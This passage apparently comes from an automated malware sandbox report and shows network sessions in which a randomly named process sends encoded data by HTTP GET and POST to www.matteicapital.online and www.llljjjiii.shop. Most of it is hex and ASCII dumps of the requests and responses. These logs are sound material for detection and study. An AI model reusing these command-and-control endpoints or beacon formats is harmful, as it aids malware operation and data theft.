                                                                                                                      Data Raw: 34 6e 4a 74 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 36 66 70 66 6d 50 58 32 6d 6f 70 66 72 6c 33 57 64 4a 59 74 4d 6c 4f 56 4b 54 6d 7a 47 4a 51 75 62 51 2b 67 51 6c 69 6c 36 34 33 79 6a 57 4d 43 57 74 47 57 57 45 4a 69 7a 45 34 35 2b 58 50 68 77 37 42 55 6d 36 39 48 31 6c 55 71 4b 78 49 35 38 49 52 2b 4f 6d 65 69 70 61 78 6f 74 48 55 4b 48 2f 4c 35 57 49 76 2f 48 42 48 64 31 44 2f 44 53 79 57 69 75 30 6b 30 66 5a 64 5a 44 73 4f 49 76 73 50 33 6f 70 74 73 59 71 58 2b 7a 4c 6c 63 47 58 57 56 78 52 35 55 31 41 37 59 50 2b 72 6f 49 34 49 66 67 6c 6b 50 69 64 76 42 63 54 55 77 79 4c 74 49 6b 48 43 66 45 5a 35 4c 78 4d 74 6c 44 78 69 36 48 58 37 4a 5a 54 6f 4d 65 63 52 67 6c 59 30 4a 64 4d 67 73 6f 31 66 37 59 69 67 69 52 77 34 55 50 6f 72 35 49 67 31 50 55 61 6a 78 73 39 7a 42 6f 67 71 77 66 44 6f 57 73 31 2f 32 4b 72 58 36 2f 41 72 69 77 42 64 7a 4a 4c 37 36 52 61 57 4b 70 76 35 37 50 46 39 4d 61 61 68 61 77 54 68 [TRUNCATED]
                                                                                                                      Data Ascii: 4nJt=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD06fpfmPX2mopfrl3WdJYtMlOVKTmzGJQubQ+gQlil643yjWMCWtGWWEJizE45+XPhw7BUm69H1lUqKxI58IR+OmeipaxotHUKH/L5WIv/HBHd1D/DSyWiu0k0fZdZDsOIvsP3optsYqX+zLlcGXWVxR5U1A7YP+roI4IfglkPidvBcTUwyLtIkHCfEZ5LxMtlDxi6HX7JZToMecRglY0JdMgso1f7YigiRw4UPor5Ig1PUajxs9zBogqwfDoWs1/2KrX6/AriwBdzJL76RaWKpv57PF9MaahawThz6wZ/1x42nmVXZ67pfiv9Mt9T2e7RtpSJYMeaugMBO5r/Qw3muMvKGPCZVRcBftnXZZyk7cJ9AeR16y9zYYk9xedGUV9oyRTcX/FGv1uaK5K6RGgLK6BvD2/X3c5XcLcdyNYppmkvtxFl1bfJZJ8ahpdjQSAcmxGUA3eyc8QeWp6whru/j5uGNWdADCmittaA0aB5GLsEYIhxw8DXhD5VyxFqHKn7osh5v9+VAg2gM/Dl3VmhQTo/mAFLj7kf0VRXmpQ9aIxkJoLgLL8Gl43FDDBJpyA1UhcB3eRyw8Y3UQlurNtz8+q4d+EKtT3i+rZKEEto2x3lh2VUrnhunAA8Hyn4L6NI2IbX9FQsBsgLsyCLxKvplsS/ycxCN5d6iHVMIuR5wXuDqA2S0JCF7mT7t1YmxlppQnw9S9YrEPbriFCErNJ4PF5LTVRQcJ9v8A9rkNp8GcCnppf+MPiWiokbbqyL8kRZDZDB3FqQkicyrH+f/aPUg2j+8IH94zgUWEG4/ckmxSwImMj29J1xIEuee/9Tu4DoxFJ1Umqw3NUoYvUy+AqRA9ZZzSF998OhQ7gkcoTJoUtrbY2jrJ1Lla+/csfgcvXxD5l092ZxkVx7k/eQKil5gy4G20RJzU1d2FbhyNvdGRPW+rvNl+toYzrHGEN+0PaMvShAP [TRUNCATED]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.2.650013208.91.197.27802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:02.996316910 CET369OUTGET /hyyd/?pXIDi=30N834GpBZU0OT&4nJt=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXzRX0Cz+jRSrIUTHSjZKbFGxkH1PP6E18JoqtQ6kBAoCTLA5p2fs= HTTP/1.1
                                                                                                                      Host: www.matteicapital.online
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:19:04.953087091 CET1236INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:03 GMT
                                                                                                                      Server: Apache
                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                      Set-Cookie: vsid=904vr48016194401796911; expires=Sun, 25-Nov-2029 10:19:04 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
                                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Fywsigjq1lMPxNYivwI9U8n2KbS913zBgG1pWE8IPJ+SG4Zvp92neIzuRlo8hX21bQ5moyyaecf1RJdZALbE/A==
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 39 66 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e
                                                                                                                      Data Ascii: 9fee<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.n
                                                                                                                      Nov 26, 2024 11:19:04.953351974 CET110INData Raw: 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64
                                                                                                                      Data Ascii: et"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAp
                                                                                                                      Nov 26, 2024 11:19:04.953363895 CET1236INData Raw: 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29
                                                                                                                      Data Ascii: pliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host"
                                                                                                                      Nov 26, 2024 11:19:04.954037905 CET1236INData Raw: 22 22 29 7b 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20
                                                                                                                      Data Ascii: ""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8
                                                                                                                      Nov 26, 2024 11:19:04.954049110 CET1236INData Raw: 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7b 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f 7d 66 75 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67
                                                                                                                      Data Ascii: toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,99
                                                                                                                      Nov 26, 2024 11:19:04.955216885 CET1236INData Raw: 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65
                                                                                                                      Data Ascii: ype="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span"
                                                                                                                      Nov 26, 2024 11:19:04.955233097 CET1236INData Raw: 69 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f
                                                                                                                      Data Ascii: indow&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","
                                                                                                                      Nov 26, 2024 11:19:04.956439018 CET730INData Raw: 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29
                                                                                                                      Data Ascii: {if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","us
                                                                                                                      Nov 26, 2024 11:19:04.998588085 CET1236INData Raw: 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65
                                                                                                                      Data Ascii: ==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{i
                                                                                                                      Nov 26, 2024 11:19:04.998800993 CET1236INData Raw: 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66
                                                                                                                      Data Ascii: rn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnV
                                                                                                                      Nov 26, 2024 11:19:05.074240923 CET1236INData Raw: 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 67 70 70 4c 6f 63 61 74
                                                                                                                      Data Ascii: mp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!wind


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      25192.168.2.6500148.210.114.150802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:11.256068945 CET615OUTPOST /rsvy/ HTTP/1.1
                                                                                                                      Host: www.llljjjiii.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.llljjjiii.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 33 4b 49 67 36 67 64 6b 34 54 50 67 68 67 43 44 55 7a 30 42 6f 6e 7a 50 46 35 63 4d 31 5a 6a 77 31 56 77 49 50 6b 54 45 34 63 66 42 4d 57 30 52 4a 58 4e 37 4f 67 65 2b 61 57 48 62 79 43 33 6a 45 72 45 62 6d 75 31 49 42 76 36 52 79 30 6f 66 39 53 66 69 35 6a 36 37 34 61 48 32 62 65 79 55 43 77 59 72 36 31 68 34 73 63 6f 4c 5a 2f 74 74 30 63 43 30 6f 30 36 6c 55 64 36 78 33 38 39 6c 30 58 32 58 6e 66 64 34 50 6d 39 56 6a 36 62 7a 31 55 74 4f 4a 37 37 37 2f 61 35 6e 49 38 6c 58 37 6a 77 38 63 54 43 51 56 75 37 41 32 4b 6c 48 56 36 6a 4b 45 4b 5a 6b 74 6f 6d 6e 45 39 32 75
                                                                                                                      Data Ascii: 4nJt=m+7KIMtJ4/BT3KIg6gdk4TPghgCDUz0BonzPF5cM1Zjw1VwIPkTE4cfBMW0RJXN7Oge+aWHbyC3jErEbmu1IBv6Ry0of9Sfi5j674aH2beyUCwYr61h4scoLZ/tt0cC0o06lUd6x389l0X2Xnfd4Pm9Vj6bz1UtOJ777/a5nI8lX7jw8cTCQVu7A2KlHV6jKEKZktomnE92u
                                                                                                                      Nov 26, 2024 11:19:12.859240055 CET925INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:12 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Set-Cookie: PHPSESSID=61efrsksu1jk9l2if3qjjcj616; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Set-Cookie: sessionid=61efrsksu1jk9l2if3qjjcj616; expires=Fri, 24-Nov-2034 10:19:12 GMT; Max-Age=315360000; path=/
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                                      Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.2.6500158.210.114.150802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:13.917531967 CET639OUTPOST /rsvy/ HTTP/1.1
                                                                                                                      Host: www.llljjjiii.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.llljjjiii.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 37 77 30 78 30 49 4f 6c 54 45 2f 63 66 42 45 32 30 55 4e 58 4e 77 4f 67 54 42 61 58 37 62 79 43 7a 6a 45 6f 51 62 6e 64 64 4c 51 76 36 54 72 6b 6f 64 7a 79 66 69 35 6a 36 37 34 65 58 59 62 65 61 55 43 68 49 72 37 58 5a 2f 33 38 6f 49 4a 50 74 74 6a 4d 44 39 6f 30 36 54 55 59 62 61 33 35 35 6c 30 57 47 58 6d 4b 78 33 45 6d 39 54 2b 4b 62 69 79 48 63 64 47 36 53 6d 77 61 70 34 59 63 52 7a 7a 31 74 6d 41 67 43 7a 48 2b 62 43 32 49 39 31 56 61 6a 67 47 4b 68 6b 2f 2f 71 41 4c 4a 54 4e 6a 39 39 63 7a 64 75 4b 62 46 46 64 35 56 42 70 33 48 44 48 42 51 3d 3d
                                                                                                                      Data Ascii: 4nJt=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1M7w0x0IOlTE/cfBE20UNXNwOgTBaX7byCzjEoQbnddLQv6Trkodzyfi5j674eXYbeaUChIr7XZ/38oIJPttjMD9o06TUYba355l0WGXmKx3Em9T+KbiyHcdG6Smwap4YcRzz1tmAgCzH+bC2I91VajgGKhk//qALJTNj99czduKbFFd5VBp3HDHBQ==
                                                                                                                      Nov 26, 2024 11:19:15.507349968 CET925INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:15 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Set-Cookie: PHPSESSID=mllms815r33rr5ffkb0pshd5c1; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Set-Cookie: sessionid=mllms815r33rr5ffkb0pshd5c1; expires=Fri, 24-Nov-2034 10:19:15 GMT; Max-Age=315360000; path=/
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                                      Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      27192.168.2.6500168.210.114.150802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:16.582716942 CET1652OUTPOST /rsvy/ HTTP/1.1
                                                                                                                      Host: www.llljjjiii.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.llljjjiii.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 7a 77 30 43 38 49 50 47 37 45 2b 63 66 42 4b 57 30 56 4e 58 4e 58 4f 67 4c 46 61 58 33 74 79 41 62 6a 65 4b 49 62 76 49 70 4c 5a 76 36 54 6b 45 6f 41 39 53 65 36 35 6a 71 2f 34 61 7a 59 62 65 61 55 43 6a 67 72 76 31 68 2f 31 38 6f 4c 5a 2f 74 78 30 63 43 59 6f 77 57 44 55 59 66 73 33 4e 4e 6c 7a 32 57 58 71 63 46 33 4a 6d 39 52 39 4b 61 2f 79 48 52 46 47 36 65 71 77 61 64 43 59 62 35 7a 6a 54 30 48 43 51 2b 2f 64 66 62 7a 77 49 52 49 53 2b 37 4e 4a 62 78 58 2f 39 57 66 42 71 72 32 76 39 6f 46 79 39 7a 46 61 47 52 48 6e 52 63 70 38 58 65 37 53 48 43 6f 58 76 6b 6f 4d 65 75 5a 2f 2b 51 67 67 49 4c 62 67 2f 77 78 72 51 6a 4b 6a 2f 64 57 4c 36 79 48 2f 39 6e 38 75 4d 41 4b 76 67 67 63 4d 35 63 57 30 32 74 70 71 42 37 55 56 6a 6e 61 73 6a 54 6f 4e 4a 47 51 42 38 6a 76 51 46 4b 4f 33 6c 68 62 46 75 63 37 45 64 48 77 57 30 61 4d 4e 6e 70 6e 53 34 44 63 31 6b 55 4e 65 [TRUNCATED]
